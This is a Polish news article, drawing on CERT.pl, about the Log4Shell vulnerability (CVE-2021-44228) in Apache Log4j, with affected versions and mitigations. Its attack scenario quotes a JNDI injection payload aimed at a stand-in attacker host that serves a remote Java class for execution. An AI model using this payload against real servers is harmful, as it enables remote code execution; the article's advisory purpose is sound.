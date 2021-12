Log4Shell spędza sen z powiek setkom firm

Biblioteka Apache Log4j jest jedną z najczęściej wykorzystywanych do logowania zdarzeń w aplikacjach napisanych w języku Java. Korzysta z niej wiele komercyjnych rozwiązań, w tym usługi oferowane przez gigantów branży takich jak Amazon, Apple czy Cisco. Z tego powodu podatność opisana pod sygnaturą CVE-2021-44228 jest tak niebezpieczna, tym bardziej, że pozwala na zdalne wykonanie dowolnego kodu. Pierwsze informacje na jej temat pojawiły się w czwartek, a dostrzeżono ją na serwerach Minecrafta. Szybko jednak okazało się, że problem jest znacznie szerszy i nie wszyscy jeszcze na niego zareagowali. Jest wysoce prawdopodobne, że przestępcy korzystają już tej luki.

Jak możemy przeczytać na stronach CERT:

Podatność pozwala na zdalne wykonanie kodu z uprawnieniami danej aplikacji, np. webservera wykorzystującego Log4j. Wykorzystanie podatności jest bardzo proste i gotowe przykłady pozwalające to zrobić są dostępne publicznie. Obserwowany jest również narastający ruch powiązany ze skanowaniem usług dostępnych z internetu i prób wykorzystania podatności.

Przykładowy scenariusz ataku może wyglądać następująco:

Aplikacja loguje zdarzenia z wykorzystaniem biblioteki Apache Log4j, np. niepoprawne logowania użytkownika, zapisując wartości kontrolowane przez użytkownika, jak login czy email, Atakujący próbuje się zalogować, jako nazwę użytkownika podając złośliwy payload, np.: ${jndi:ldap://sample_domain.com/a} (gdzie sample_domain.com jest serwerem, kontrolowanym przez atakującego), Luka w log4j jest wywoływana przez payload, a serwer wysyła żądanie do attacker_domain.com poprzez "Java Naming and Directory Interface" (JNDI), Odpowiedź zawiera ścieżkę do zdalnego pliku klasy Java (np. http://test.sample_domain.com/Exploit.class), który jest wstrzykiwany do procesu serwera, Wstrzyknięty payload pozwala atakującemu na wykonanie dowolnego kodu.

Zagrożone podatnością są wszystkie wersje Log4j od 2.0 do 2.14.1 włącznie, a dopiero najnowsza - 2.15.0 została załatana i można z niej bezpiecznie korzystać. Jeśli niemożliwa jest natychmiastowa aktualizacja biblioteki to warto śledzić dane wprowadzane do systemu pod kątem ciągu znaków "${jndi:", który jest stosowany do wykonania złośliwego kodu. Innym sposobem jest ręcznie usunięcie z biblioteki klasy JndiLookup, na której bazuje podatność Log4Shell.

źródło: Cert.pl